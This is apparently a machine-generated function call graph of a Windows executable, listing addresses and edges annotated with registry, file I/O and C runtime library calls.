7787 281875 RegQueryValueExW 7785->7787 7788 281867 7785->7788 7786->7785 7789 2818a2 RegQueryValueExW 7787->7789 7790 281894 7787->7790 7788->7787 7791 2818ce RegQueryValueExW 7789->7791 7792 2818c1 7789->7792 7790->7789 7793 2818fb RegQueryValueExW 7791->7793 7794 2818ed 7791->7794 7792->7791 7795 281928 RegQueryValueExW 7793->7795 7796 28191a 7793->7796 7794->7793 7797 281954 RegQueryValueExW 7795->7797 7798 281947 7795->7798 7796->7795 7799 281981 RegQueryValueExW 7797->7799 7800 281973 7797->7800 7798->7797 7801 2819ae RegQueryValueExW 7799->7801 7802 2819a0 7799->7802 7800->7799 7803 2819da RegQueryValueExW 7801->7803 7804 2819cd 7801->7804 7802->7801 7805 2819f9 7803->7805 7806 281a07 RegQueryValueExW 7803->7806 7804->7803 7805->7806 7807 281a34 RegQueryValueExW 7806->7807 7808 281a26 7806->7808 7809 281a60 RegQueryValueExW 7807->7809 7810 281a53 7807->7810 7808->7807 7811 281a8d RegQueryValueExW 7809->7811 7812 281a7f 7809->7812 7810->7809 7813 281aba RegQueryValueExW 7811->7813 7814 281aac 7811->7814 7812->7811 7815 281ad9 7813->7815 7816 281ae6 RegQueryValueExW 7813->7816 7814->7813 7815->7816 7817 281b13 RegQueryValueExW 7816->7817 7818 281b05 7816->7818 7819 281b4e 7817->7819 7820 281b74 RegQueryValueExW 7817->7820 7818->7817 7819->7820 8828 281020 RegOpenKeyW 7819->8828 7821 281b9a 7820->7821 7822 281bb2 RegQueryValueExW 7820->7822 7821->7822 7824 281ba0 lstrcpyW 7821->7824 7825 281bd9 7822->7825 7826 281bf1 RegQueryValueExW 7822->7826 7824->7822 7825->7826 7830 281bdf lstrcpyW 7825->7830 7827 281c2b RegCloseKey 7826->7827 7828 281c13 7826->7828 7827->7776 7828->7827 7831 281c19 lstrcpyW 7828->7831 7830->7826 7831->7827 7832->7350 7834 2826a5 7833->7834 7835 282792 lstrlenW 7834->7835 7836 2827d4 InvalidateRect 7834->7836 7841 2827f6 7834->7841 7837 2827b3 lstrcatW 7835->7837 7836->7841 7839 2827d0 7837->7839 7839->7836 7840 282803 7839->7840 8833 282610 LoadStringW wsprintfW LoadStringW MessageBoxW 7840->8833 7841->7353 7843 28280f 7844 28288a DestroyWindow 7843->7844 7845 282814 7843->7845 7844->7841 7845->7841 7846 282819 lstrcpyW GetFileTitleW CreateFileW 7845->7846 7847 28287d 7846->7847 7848 282876 CloseHandle 7846->7848 7847->7353 7848->7847 7852 282c8c __mtinitlocknum 7849->7852 7850 282c9f 7851 283cf8 __write_nolock 66 API calls 7850->7851 7853 282ca4 7851->7853 7852->7850 7854 282ccd 7852->7854 7855 283ca6 __write_nolock 11 API calls 7853->7855 7868 2839e9 7854->7868 7864 282caf __mtinitlocknum @_EH4_CallFilterFunc@8 7855->7864 7857 282cd2 7858 282cd9 7857->7858 7859 282ce6 7857->7859 7860 283cf8 __write_nolock 66 API calls 7858->7860 7861 282d0e 7859->7861 7862 282cee 7859->7862 7860->7864 7885 283730 7861->7885 7865 283cf8 __write_nolock 66 API calls 7862->7865 7864->7722 7865->7864 7869 2839f5 __mtinitlocknum 7868->7869 7870 286fb4 __lock 66 API calls 7869->7870 7883 283a03 7870->7883 7871 283a78 7908 283b13 7871->7908 7872 283a7f 7873 286c85 __malloc_crt 66 API calls 7872->7873 7875 283a86 7873->7875 7875->7871 7877 283a94 InitializeCriticalSectionAndSpinCount 7875->7877 7876 283b08 __mtinitlocknum 7876->7857 7878 283ab4 7877->7878 7879 283ac7 EnterCriticalSection 7877->7879 7882 286d64 _free 66 API calls 7878->7882 7879->7871 7880 286ef2 __mtinitlocknum 66 API calls 7880->7883 7882->7871 7883->7871 7883->7872 7883->7880 7911 283693 7883->7911 7916 283701 7883->7916 7886 283752 7885->7886 7887 28376d 7886->7887 7899 283784 __wopenfile 7886->7899 7889 283cf8 __write_nolock 66 API calls 7887->7889 7888 283939 7891 283992 7888->7891 7892 2839a4 7888->7892 7890 283772 7889->7890 7893 283ca6 __write_nolock 11 API calls 7890->7893 7894 283cf8 __write_nolock 66 API calls 7891->7894 7923 2877e0 7892->7923 7897 282d19 7893->7897 7896 283997 7894->7896 7898 283ca6 __write_nolock 11 API calls 7896->7898 7905 282d34 7897->7905 7898->7897 7899->7888 7899->7891 7926 2878e5 7899->7926 7902 2878e5 __wcsnicmp 78 API calls 7903 283951 7902->7903 7903->7888 7904 2878e5 __wcsnicmp 78 API calls 7903->7904 7904->7888 8492 2836c5 7905->8492 7907 282d3c 7907->7864 7921 286edb LeaveCriticalSection 7908->7921 7910 283b1a 7910->7876 7912 2836a0 7911->7912 7913 2836b6 EnterCriticalSection 7911->7913 7914 286fb4 __lock 66 API calls 7912->7914 7913->7883 7915 2836a9 7914->7915 7915->7883 7917 283711 7916->7917 7918 283724 LeaveCriticalSection 7916->7918 7922 286edb LeaveCriticalSection 7917->7922 7918->7883 7920 283721 7920->7883 7921->7910 7922->7920 7934 28771c 7923->7934 7925 2877fb 7925->7897 7927 28796d 7926->7927 7928 2878f4 7926->7928 8382 287800 7927->8382 7930 283932 7928->7930 7931 283cf8 __write_nolock 66 API calls 7928->7931 7930->7888 7930->7902 7932 28790b 7931->7932 7933 283ca6 __write_nolock 11 API calls 7932->7933 7933->7930 7937 287728 __mtinitlocknum 7934->7937 7935 28773b 7936 283cf8 __write_nolock 66 API calls 7935->7936 7938 287740 7936->7938 7937->7935 7939 287771 7937->7939 7941 283ca6 __write_nolock 11 API calls 7938->7941 7945 286fe7 7939->7945 7944 28774a __mtinitlocknum 7941->7944 7942 28778b 8052 2877b2 7942->8052 7944->7925 7946 28700e 7945->7946 8056 28ab72 7946->8056 7948 287299 7949 283c54 __invoke_watson 10 API calls 7948->7949 7951 28771b __mtinitlocknum 7949->7951 7950 287069 8081 283d0b 7950->8081 7954 28773b 7951->7954 7961 287771 7951->7961 7953 28702a 7953->7948 7953->7950 7958 2870c4 7953->7958 7956 283cf8 __write_nolock 66 API calls 7954->7956 7959 287740 7956->7959 7957 283cf8 __write_nolock 66 API calls 7960 287078 7957->7960 7963 28714b 7958->7963 7972 28711e 7958->7972 7964 283ca6 __write_nolock 11 API calls 7959->7964 7965 283ca6 __write_nolock 11 API calls 7960->7965 7962 286fe7 __tsopen_nolock 115 API calls 7961->7962 7966 28778b 7962->7966 7967 283d0b __write_nolock 66 API calls 7963->7967 7971 28774a __mtinitlocknum 7964->7971 7977 287082 7965->7977 7968 2877b2 __wsopen_helper LeaveCriticalSection 7966->7968 7969 287150 7967->7969 7968->7971 7970 283cf8 __write_nolock 66 API calls 7969->7970 7973 28715a 7970->7973 7971->7942 8063 28970b 7972->8063 7975 283ca6 __write_nolock 11 API calls 7973->7975 7975->7977 7976 2871dc 7978 2871e5 7976->7978 7979 287206 CreateFileW 7976->7979 7977->7942 7980 283d0b __write_nolock 66 API calls 7978->7980 7981 2872a3 GetFileType 7979->7981 7982 287233 7979->7982 7983 2871ea 7980->7983 7984 2872b0 GetLastError 7981->7984 7985 2872f4 7981->7985 7986 28726c GetLastError 7982->7986 7989 287247 CreateFileW 7982->7989 7987 283cf8 __write_nolock 66 API calls 7983->7987 7988 283d1e __dosmaperr 66 API calls 7984->7988 8089 2894d5 7985->8089 8084 283d1e 7986->8084 7991 2871f4 7987->7991 7992 2872d9 CloseHandle 7988->7992 7989->7981 7989->7986 7994 283cf8 __write_nolock 66 API calls 7991->7994 7993 287293 7992->7993 7995 2872e7 7992->7995 7997 283cf8 __write_nolock 66 API calls 7993->7997 7994->7977 7998 283cf8 __write_nolock 66 API calls 7995->7998 7997->7948 7999 2872ec 7998->7999 7999->7993 8000 287529 8000->7948 8003 287691 CloseHandle CreateFileW 8000->8003 8006 2876be GetLastError 8003->8006 8007 28759d 8003->8007 8005 287380 8005->8000 8014 287532 8005->8014 8017 287388 8005->8017 8026 287482 8005->8026 8010 283d1e __dosmaperr 66 API calls 8006->8010 8007->7948 8008 28737b 8011 283d0b __write_nolock 66 API calls 8008->8011 8009 287394 8123 28500b 8009->8123 8013 2876ca 8010->8013 8011->8005 8258 289556 8013->8258 8014->8000 8025 28754f 8014->8025 8030 2874a6 8014->8030 8108 28a957 8017->8108 8018 2874fa 8022 28500b __read_nolock 75 API calls 8018->8022 8019 2873c6 8021 285a1f __lseek_nolock 68 API calls 8019->8021 8020 2873b3 8191 28a7a1 8020->8191 8021->8005 8038 287507 8022->8038 8028 287c67 __lseeki64_nolock 68 API calls 8025->8028 8026->8000 8026->8018 8026->8030 8031 2874d1 8026->8031 8029 28755a 8028->8029 8029->8030 8033 287565 8029->8033 8030->8000 8030->8017 8233 2884d3 8030->8233 8223 287c67 8031->8223 8041 287c67 __lseeki64_nolock 68 API calls 8033->8041 8035 2875aa 8037 2875cc 8035->8037 8039 2875b1 8035->8039 8036 287590 8043 28a957 __close_nolock 69 API calls 8036->8043 8042 285a1f __lseek_nolock 68 API calls 8037->8042 8038->8000 8038->8017 8038->8035 8038->8036 8038->8037 8044 285a1f __lseek_nolock 68 API calls 8039->8044 8046 28756f 8041->8046 8048 287574 8042->8048 8047 287597 8043->8047 8044->8048 8045 2874e3 8049 287c67 __lseeki64_nolock 68 API calls 8045->8049 8046->8048 8050 283cf8 __write_nolock 66 API calls 8047->8050 8048->8000 8048->8017 8051 2874ed 8049->8051 8050->8007 8051->8017 8051->8018 8053 2877b7 8052->8053 8055 2877de 8052->8055 8381 2896e4 LeaveCriticalSection 8053->8381 8055->7944 8057 28ab7e 8056->8057 8058 28ab93 8056->8058 8059 283cf8 __write_nolock 66 API calls 8057->8059 8058->7953 8060 28ab83 8059->8060 8061 283ca6 __write_nolock 11 API calls 8060->8061 8062 28ab8e 8061->8062 8062->7953 8064 289717 __mtinitlocknum 8063->8064 8065 286ef2 __mtinitlocknum 66 API calls 8064->8065 8066 289727 8065->8066 8067 286fb4 __lock 66 API calls 8066->8067 8069 28972c __mtinitlocknum 8066->8069 8068 28973b 8067->8068 8071 289813 8068->8071 8074 286fb4 __lock 66 API calls 8068->8074 8075 2897bb EnterCriticalSection 8068->8075 8077 289791 InitializeCriticalSectionAndSpinCount 8068->8077 8080 28987d 8068->8080 8267 2897dd 8068->8267 8069->7976 8072 286cca __calloc_crt 66 API calls 8071->8072 8073 28981c 8072->8073 8073->8080 8270 289645 8073->8270 8074->8068 8075->8068 8076 2897cb LeaveCriticalSection 8075->8076 8076->8068 8077->8068 8280 28989b 8080->8280 8082 28688f __getptd_noexit 66 API calls 8081->8082 8083 283d10 8082->8083 8083->7957 8085 283d0b __write_nolock 66 API calls 8084->8085 8086 283d29 __dosmaperr 8085->8086 8087 283cf8 __write_nolock 66 API calls 8086->8087 8088 283d3c 8087->8088 8088->7993 8090 28953c 8089->8090 8091 2894e3 8089->8091 8092 283cf8 __write_nolock 66 API calls 8090->8092 8091->8090 8097 289507 8091->8097 8093 289541 8092->8093 8094 283d0b __write_nolock 66 API calls 8093->8094 8095 287312 8094->8095 8095->8000 8095->8005 8098 285a1f 8095->8098 8096 28952c SetStdHandle 8096->8095 8097->8095 8097->8096 8288 2895dc 8098->8288 8100 285a2e 8101 285a44 SetFilePointer 8100->8101 8102 285a34 8100->8102 8104 285a5b GetLastError 8101->8104 8105 285a63 8101->8105 8103 283cf8 __write_nolock 66 API calls 8102->8103 8106 285a39 8103->8106 8104->8105 8105->8106 8107 283d1e __dosmaperr 66 API calls 8105->8107 8106->8008 8106->8009 8107->8106 8109 2895dc __lseek_nolock 66 API calls 8108->8109 8110 28a967 8109->8110 8111 28a9bd 8110->8111 8113 28a99b 8110->8113 8116 2895dc __lseek_nolock 66 API calls 8110->8116 8112 289556 __free_osfhnd 67 API calls 8111->8112 8115 28a9c5 8112->8115 8113->8111 8114 2895dc __lseek_nolock 66 API calls 8113->8114 8117 28a9a7 CloseHandle 8114->8117 8118 28a9e7 8115->8118 8121 283d1e __dosmaperr 66 API calls 8115->8121 8119 28a992 8116->8119 8117->8111 8120 28a9b3 GetLastError 8117->8120 8118->7999 8122 2895dc __lseek_nolock 66 API calls 8119->8122 8120->8111 8121->8118 8122->8113 8124 285042 8123->8124 8125 285027 8123->8125 8127 285051 8124->8127 8129 285070 8124->8129 8126 283d0b __write_nolock 66 API calls 8125->8126 8128 28502c 8126->8128 8130 283d0b __write_nolock 66 API calls 8127->8130 8133 283cf8 __write_nolock 66 API calls 8128->8133 8132 28508e 8129->8132 8146 2850a2 8129->8146 8131 285056 8130->8131 8134 283cf8 __write_nolock 66 API calls 8131->8134 8135 283d0b __write_nolock 66 API calls 8132->8135 8143 285034 8133->8143 8137 28505d 8134->8137 8139 285093 8135->8139 8136 2850f8 8138 283d0b __write_nolock 66 API calls 8136->8138 8140 283ca6 __write_nolock 11 API calls 8137->8140 8141 2850fd 8138->8141 8142 283cf8 __write_nolock 66 API calls 8139->8142 8140->8143 8144 283cf8 __write_nolock 66 API calls 8141->8144 8145 28509a 8142->8145 8143->8019 8143->8020 8144->8145 8149 283ca6 __write_nolock 11 API calls 8145->8149 8146->8136 8146->8143 8147 2850d7 8146->8147 8148 285111 8146->8148 8147->8136 8155 2850e2 ReadFile 8147->8155 8150 286c85 __malloc_crt 66 API calls 8148->8150 8149->8143 8152 285127 8150->8152 8156 28514f 8152->8156 8157 285131 8152->8157 8153 28520d 8154 285585 GetLastError 8153->8154 8162 285221 8153->8162 8158 28540c 8154->8158 8159 285592 8154->8159 8155->8153 8155->8154 8163 287c67 __lseeki64_nolock 68 API calls 8156->8163 8160 283cf8 __write_nolock 66 API calls 8157->8160 8166 283d1e __dosmaperr 66 API calls 8158->8166 8172 285391 8158->8172 8161 283cf8 __write_nolock 66 API calls 8159->8161 8164 285136 8160->8164 8165 285597 8161->8165 8171 28523d 8162->8171 8162->8172 8176 285451 8162->8176 8167 28515d 8163->8167 8168 283d0b __write_nolock 66 API calls 8164->8168 8169 283d0b __write_nolock 66 API calls 8165->8169 8166->8172 8167->8155 8168->8143 8169->8172 8170 286d64 _free 66 API calls 8170->8143 8173 2852a1 ReadFile 8171->8173 8178 28531e 8171->8178 8172->8143 8172->8170 8175 2852bf GetLastError 8173->8175 8187 2852c9 8173->8187 8174 2854c6 ReadFile 8177 2854e5 GetLastError 8174->8177 8188 2854ef 8174->8188 8175->8171 8175->8187 8176->8172 8176->8174 8177->8176 8177->8188 8178->8172 8179 285399 8178->8179 8180 28538c 8178->8180 8183 285356 8178->8183 8179->8183 8184 2853d0 8179->8184 8182 283cf8 __write_nolock 66 API calls 8180->8182 8181 285406 GetLastError 8181->8158 8182->8172 8183->8172 8183->8181 8189 287c67 __lseeki64_nolock 68 API calls 8184->8189 8185 287c67 __lseeki64_nolock 68 API calls 8185->8187 8186 287c67 __lseeki64_nolock 68 API calls 8186->8188 8187->8171 8187->8185 8188->8176 8188->8186 8190 2853df 8189->8190 8190->8183 8192 287c67 __lseeki64_nolock 68 API calls 8191->8192 8193 28a7c0 8192->8193 8194 28a823 8193->8194 8196 287c67 __lseeki64_nolock 68 API calls 8193->8196 8195 283cf8 __write_nolock 66 API calls 8194->8195 8197 2873bf 8194->8197 8195->8197 8199 28a7dc 8196->8199 8197->8017 8197->8019 8198 28a8be 8202 287c67 __lseeki64_nolock 68 API calls 8198->8202 8218 28a927 8198->8218 8199->8194 8199->8198 8200 28a802 HeapAlloc 8199->8200 8205 28a81e 8200->8205 8211 28a835 __setmode_nolock 8200->8211 8201 287c67 __lseeki64_nolock 68 API calls 8201->8194 8204 28a8d7 8202->8204 8204->8194 8207 2895dc __lseek_nolock 66 API calls 8204->8207 8206 283cf8 __write_nolock 66 API calls 8205->8206 8206->8194 8208 28a8ed SetEndOfFile 8207->8208 8209 28a90a 8208->8209 8208->8218 8210 283cf8 __write_nolock 66 API calls 8209->8210 8212 28a90f 8210->8212 8215 28a8a1 8211->8215 8220 28a878 __setmode_nolock 8211->8220 8301 287dd6 8211->8301 8214 283d0b __write_nolock 66 API calls 8212->8214 8216 28a91a GetLastError 8214->8216 8217 283d0b __write_nolock 66 API calls 8215->8217 8216->8218 8219 28a8a6 8217->8219 8218->8194 8218->8201 8219->8220 8221 283cf8 __write_nolock 66 API calls 8219->8221 8222 28a893 HeapFree 8220->8222 8221->8220 8222->8218 8224 2895dc __lseek_nolock 66 API calls 8223->8224 8225 287c85 8224->8225 8226 287c8d 8225->8226 8227 287c9e SetFilePointer 8225->8227 8228 283cf8 __write_nolock 66 API calls 8226->8228 8229 287cb6 GetLastError 8227->8229 8230 2874dc 8227->8230 8228->8230 8229->8230 8231 287cc0 8229->8231 8230->8030 8230->8045 8232 283d1e __dosmaperr 66 API calls 8231->8232 8232->8230 8234 2884df __mtinitlocknum 8233->8234 8235 288502 8234->8235 8236 2884e7 8234->8236 8238 28850e 8235->8238 8241 288548 8235->8241 8237 283d0b __write_nolock 66 API calls 8236->8237 8239 2884ec 8237->8239 8240 283d0b __write_nolock 66 API calls 8238->8240 8242 283cf8 __write_nolock 66 API calls 8239->8242 8243 288513 8240->8243 8244 289645 ___lock_fhandle 68 API calls 8241->8244 8253 2884f4 __mtinitlocknum 8242->8253 8245 283cf8 __write_nolock 66 API calls 8243->8245 8246 28854e 8244->8246 8247 28851b 8245->8247 8248 28855c 8246->8248 8249 288570 8246->8249 8250 283ca6 __write_nolock 11 API calls 8247->8250 8251 287dd6 __write_nolock 92 API calls 8248->8251 8252 283cf8 __write_nolock 66 API calls 8249->8252 8250->8253 8254 288568 8251->8254 8255 288575 8252->8255 8253->8030 8377 28859f 8254->8377 8256 283d0b __write_nolock 66 API calls 8255->8256 8256->8254 8259 2895c2 8258->8259 8260 289567 8258->8260 8261 283cf8 __write_nolock 66 API calls 8259->8261 8260->8259 8265 289592 8260->8265 8262 2895c7 8261->8262 8263 283d0b __write_nolock 66 API calls 8262->8263 8264 2895b8 8263->8264 8264->8007 8265->8264 8266 2895b2 SetStdHandle 8265->8266 8266->8264 8283 286edb LeaveCriticalSection 8267->8283 8269 2897e4 8269->8068 8271 289651 __mtinitlocknum 8270->8271 8272 2896ab 8271->8272 8273 286fb4 __lock 66 API calls 8271->8273 8274 2896cd __mtinitlocknum 8272->8274 8275 2896b0 EnterCriticalSection 8272->8275 8276 28967d 8273->8276 8274->8080 8275->8274 8277 289699 8276->8277 8278 289686 InitializeCriticalSectionAndSpinCount 8276->8278 8284 2896db 8277->8284 8278->8277 8287 286edb LeaveCriticalSection 8280->8287 8282 2898a2 8282->8069 8283->8269 8285 286edb _doexit LeaveCriticalSection 8284->8285 8286 2896e2 8285->8286 8286->8272 8287->8282 8289 2895e9 8288->8289 8291 289601 8288->8291 8290 283d0b __write_nolock 66 API calls 8289->8290 8293 2895ee 8290->8293 8292 283d0b __write_nolock 66 API calls 8291->8292 8295 289640 8291->8295 8294 289612 8292->8294 8296 283cf8 __write_nolock 66 API calls 8293->8296 8298 283cf8 __write_nolock 66 API calls 8294->8298 8295->8100 8297 2895f6 8296->8297 8297->8100 8299 28961a 8298->8299 8300 283ca6 __write_nolock 11 API calls 8299->8300 8300->8297 8302 287de5 __write_nolock 8301->8302 8303 287e10 8302->8303 8304 287e3a 8302->8304 8305 287e1b 8302->8305 8306 2879c4 __write_nolock 5 API calls 8303->8306 8309 287e96 8304->8309 8310 287e79 8304->8310 8307 283d0b __write_nolock 66 API calls 8305->8307 8308 2884d1 8306->8308 8311 287e20 8307->8311 8308->8211 8313 287ea9 8309->8313 8317 287c67 __lseeki64_nolock 68 API calls 8309->8317 8312 283d0b __write_nolock 66 API calls 8310->8312 8314 283cf8 __write_nolock 66 API calls 8311->8314 8316 287e7e 8312->8316 8360 2885f0 8313->8360 8318 287e27 8314->8318 8321 283cf8 __write_nolock 66 API calls 8316->8321 8317->8313 8319 283ca6 __write_nolock 11 API calls 8318->8319 8319->8303 8320 287eb2 8322 288154 8320->8322 8369 286908 8320->8369 8323 287e86 8321->8323 8325 288163 8322->8325 8326 288404 WriteFile 8322->8326 8324 283ca6 __write_nolock 11 API calls 8323->8324 8324->8303 8328 28821e 8325->8328 8340 288176 8325->8340 8330 288437 GetLastError 8326->8330 8333 288136 8326->8333 8339 28822b 8328->8339 8349 2882f8 8328->8349 8330->8333 8331 288482 8331->8303 8336 283cf8 __write_nolock 66 API calls 8331->8336 8332 287ef6 8332->8322 8334 287f06 GetConsoleCP 8332->8334 8333->8303 8333->8331 8337 288455 8333->8337 8334->8333 8357 287f29 8334->8357 8335 2881c0 WriteFile 8335->8330 8335->8340 8341 2884a5 8336->8341 8343 288460 8337->8343 8344 288474 8337->8344 8338 28829a WriteFile 8338->8330 8338->8339 8339->8331 8339->8333 8339->8338 8340->8331 8340->8333 8340->8335 8347 283d0b __write_nolock 66 API calls 8341->8347 8342 288369 WideCharToMultiByte 8342->8330 8345 2883a0 WriteFile 8342->8345 8348 283cf8 __write_nolock 66 API calls 8343->8348 8346 283d1e __dosmaperr 66 API calls 8344->8346 8345->8349 8350 2883d7 GetLastError 8345->8350 8346->8303 8347->8303 8351 288465 8348->8351 8349->8331 8349->8333 8349->8342 8349->8345 8350->8349 8352 283d0b __write_nolock 66 API calls 8351->8352 8352->8303 8354 287fd5 WideCharToMultiByte 8354->8333 8356 288006 WriteFile 8354->8356 8355 2893d1 76 API calls __fassign 8355->8357 8356->8330 8356->8357 8357->8330 8357->8333 8357->8354 8357->8355 8358 28ad45 WriteConsoleW CreateFileW __write_nolock 8357->8358 8359 28805a WriteFile 8357->8359 8374 289423 8357->8374 8358->8357 8359->8330 8359->8357 8361 28860c 8360->8361 8362 2885fd 8360->8362 8365 28862a 8361->8365 8366 283cf8 __write_nolock 66 API calls 8361->8366 8363 283cf8 __write_nolock 66 API calls 8362->8363 8364 288602 8363->8364 8364->8320 8365->8320 8367 28861d 8366->8367 8368 283ca6 __write_nolock 11 API calls 8367->8368 8368->8364 8370 28688f __getptd_noexit 66 API calls 8369->8370 8371 286910 8370->8371 8372 28691d GetConsoleMode 8371->8372 8373 286018 __amsg_exit 66 API calls 8371->8373 8372->8322 8372->8332 8373->8372 8375 2893eb __isleadbyte_l 76 API calls 8374->8375 8376 289432 8375->8376 8376->8357 8380 2896e4 LeaveCriticalSection 8377->8380 8379 2885a5 8379->8253 8380->8379 8381->8055 8383 287815 8382->8383 8390 28782c 8382->8390 8384 28781c 8383->8384 8386 28783d 8383->8386 8385 283cf8 __write_nolock 66 API calls 8384->8385 8387 287821 8385->8387 8393 2841f6 8386->8393 8389 283ca6 __write_nolock 11 API calls 8387->8389 8389->8390 8390->7930 8391 287849 8391->8390 8392 28ab9f 78 API calls __towlower_l 8391->8392 8392->8391 8394 284209 8393->8394 8395 284256 8393->8395 8396 286908 __getptd 66 API calls 8394->8396 8395->8391 8397 28420e 8396->8397 8398 284236 8397->8398 8401 288fec 8397->8401 8398->8395 8416 288869 8398->8416 8402 288ff8 __mtinitlocknum 8401->8402 8403 286908 __getptd 66 API calls 8402->8403 8404 288ffd 8403->8404 8405 28902b 8404->8405 8406 28900f 8404->8406 8407 286fb4 __lock 66 API calls 8405->8407 8408 286908 __getptd 66 API calls 8406->8408 8409 289032 8407->8409 8410 289014 8408->8410 8432 288f9d 8409->8432 8414 286018 __amsg_exit 66 API calls 8410->8414 8415 289022 __mtinitlocknum 8410->8415 8414->8415 8415->8398 8417 288875 __mtinitlocknum 8416->8417 8418 286908 __getptd 66 API calls 8417->8418 8419 28887a 8418->8419 8420 286fb4 __lock 66 API calls 8419->8420 8429 28888c 8419->8429 8421 2888aa 8420->8421 8422 2888f3 8421->8422 8423 2888db InterlockedIncrement 8421->8423 8424 2888c1 InterlockedDecrement 8421->8424 8488 288904 8422->8488 8423->8422 8424->8423 8428 2888cc 8424->8428 8426 286018 __amsg_exit 66 API calls 8427 28889a __mtinitlocknum 8426->8427 8427->8395 8428->8423 8430 286d64 _free 66 API calls 8428->8430 8429->8426 8429->8427 8431 2888da 8430->8431 8431->8423 8433 288faa 8432->8433 8434 288fdf 8432->8434 8433->8434 8435 288d2a ___addlocaleref 8 API calls 8433->8435 8440 289059 8434->8440 8436 288fc0 8435->8436 8436->8434 8443 288db9 8436->8443 8487 286edb LeaveCriticalSection 8440->8487 8442 289060 8442->8410 8444 288dca InterlockedDecrement 8443->8444 8445 288e4d 8443->8445 8446 288ddf InterlockedDecrement 8444->8446 8447 288de2 8444->8447 8445->8434 8457 288e52 8445->8457 8446->8447 8448 288dec InterlockedDecrement 8447->8448 8449 288def 8447->8449 8448->8449 8450 288df9 InterlockedDecrement 8449->8450 8451 288dfc 8449->8451 8450->8451 8452 288e06 InterlockedDecrement 8451->8452 8454 288e09 8451->8454 8452->8454 8453 288e22 InterlockedDecrement 8453->8454 8454->8453 8455 288e32 InterlockedDecrement 8454->8455 8456 288e3d InterlockedDecrement 8454->8456 8455->8454 8456->8445 8458 288ed6 8457->8458 8460 288e69 8457->8460 8459 288f23 8458->8459 8461 286d64 _free 66 API calls 8458->8461 8462 28b12f ___free_lc_time 66 API calls 8459->8462 8483 288f4c 8459->8483 8460->8458 8467 286d64 _free 66 API calls 8460->8467 8469 288e9d 8460->8469 8463 288ef7 8461->8463 8464 288f41 8462->8464 8465 286d64 _free 66 API calls 8463->8465 8466 286d64 _free 66 API calls 8464->8466 8470 288f0a 8465->8470 8466->8483 8473 288e92 8467->8473 8468 288f91 8474 286d64 _free 66 API calls 8468->8474 8475 286d64 _free 66 API calls 8469->8475 8486 288ebe 8469->8486 8476 286d64 _free 66 API calls 8470->8476 8471 286d64 _free 66 API calls 8472 288ecb 8471->8472 8478 286d64 _free 66 API calls 8472->8478 8479 28b50f ___free_lconv_mon 66 API calls 8473->8479 8480 288f97 8474->8480 8481 288eb3 8475->8481 8482 288f18 8476->8482 8477 286d64 66 API calls _free 8477->8483 8478->8458 8479->8469 8480->8434 8484 28b4a6 ___free_lconv_num 66 API calls 8481->8484 8485 286d64 _free 66 API calls 8482->8485 8483->8468 8483->8477 8484->8486 8485->8459 8486->8471 8487->8442 8491 286edb LeaveCriticalSection 8488->8491 8490 28890b 8490->8429 8491->8490 8493 2836f5 LeaveCriticalSection 8492->8493 8494 2836d6 8492->8494 8493->7907 8494->8493 8495 2836dd 8494->8495 8498 286edb LeaveCriticalSection 8495->8498 8497 2836f2 8497->7907 8498->8497 8500 283664 8499->8500 8501 283686 EnterCriticalSection 8499->8501 8500->8501 8502 28366c 8500->8502 8503 2833a5 8501->8503 8504 286fb4 __lock 66 API calls 8502->8504 8505 2832d5 8503->8505 8504->8503 8506 2832f5 8505->8506 8507 2832e5 8505->8507 8509 283307 8506->8509 8558 2830dc 8506->8558 8508 283cf8 __write_nolock 66 API calls 8507->8508 8510 2832ea 8508->8510 8520 285b68 8509->8520 8517 2833d1 8510->8517 8515 283347 8533 285a94 8515->8533 8518 2836c5 _fseek 2 API calls 8517->8518 8519 2833d9 8518->8519 8519->7734 8521 283315 8520->8521 8522 285b81 8520->8522 8526 2856b8 8521->8526 8522->8521 8523 2856b8 __flush 66 API calls 8522->8523 8524 285b9c 8523->8524 8525 2884d3 __write 95 API calls 8524->8525 8525->8521 8527 2856d9 8526->8527 8528 2856c4 8526->8528 8527->8515 8529 283cf8 __write_nolock 66 API calls 8528->8529 8530 2856c9 8529->8530 8531 283ca6 __write_nolock 11 API calls 8530->8531 8532 2856d4 8531->8532 8532->8515 8534 285aa0 __mtinitlocknum 8533->8534 8535 285aa8 8534->8535 8536 285ac3 8534->8536 8537 283d0b __write_nolock 66 API calls 8535->8537 8538 285acf 8536->8538 8541 285b09 8536->8541 8539 285aad 8537->8539 8540 283d0b __write_nolock 66 API calls 8538->8540 8542 283cf8 __write_nolock 66 API calls 8539->8542 8543 285ad4 8540->8543 8544 289645 ___lock_fhandle 68 API calls 8541->8544 8553 285ab5 __mtinitlocknum 8542->8553 8545 283cf8 __write_nolock 66 API calls 8543->8545 8546 285b0f 8544->8546 8547 285adc 8545->8547 8548 285b1d 8546->8548 8549 285b31 8546->8549 8550 283ca6 __write_nolock 11 API calls 8547->8550 8551 285a1f __lseek_nolock 68 API calls 8548->8551 8552 283cf8 __write_nolock 66 API calls 8549->8552 8550->8553 8554 285b29 8551->8554 8555 285b36 8552->8555 8553->8510 8575 285b60 8554->8575 8556 283d0b __write_nolock 66 API calls 8555->8556 8556->8554 8559 2830ef 8558->8559 8560 283107 8558->8560 8561 283cf8 __write_nolock 66 API calls 8559->8561 8562 2856b8 __flush 66 API calls 8560->8562 8563 2830f4 8561->8563 8564 28310e 8562->8564 8565 283ca6 __write_nolock 11 API calls 8563->8565 8566 285a94 __write 71 API calls 8564->8566 8574 2830ff 8565->8574 8567 283125 8566->8567 8568 283197 8567->8568 8570 283157 8567->8570 8567->8574 8569 283cf8 __write_nolock 66 API calls 8568->8569 8569->8574 8571 285a94 __write 71 API calls 8570->8571 8570->8574 8572 2831f2 8571->8572 8573 285a94 __write 71 API calls 8572->8573 8572->8574 8573->8574 8574->8509 8578 2896e4 LeaveCriticalSection 8575->8578 8577 285b66 8577->8553 8578->8577 8580 2836c5 _fseek 2 API calls 8579->8580 8581 2832d3 8580->8581 8581->7748 8583 28303d __mtinitlocknum 8582->8583 8584 28307e 8583->8584 8585 283051 _memset 8583->8585 8594 283076 __mtinitlocknum 8583->8594 8586 283652 __lock_file 67 API calls 8584->8586 8587 283cf8 __write_nolock 66 API calls 8585->8587 8588 283086 8586->8588 8589 28306b 8587->8589 8595 282e75 8588->8595 8591 283ca6 __write_nolock 11 API calls 8589->8591 8591->8594 8594->7751 8599 282e93 _memset 8595->8599 8602 282ead 8595->8602 8596 282e9d 8597 283cf8 __write_nolock 66 API calls 8596->8597 8598 282ea2 8597->8598 8600 283ca6 __write_nolock 11 API calls 8598->8600 8599->8596 8599->8602 8606 282ee8 8599->8606 8600->8602 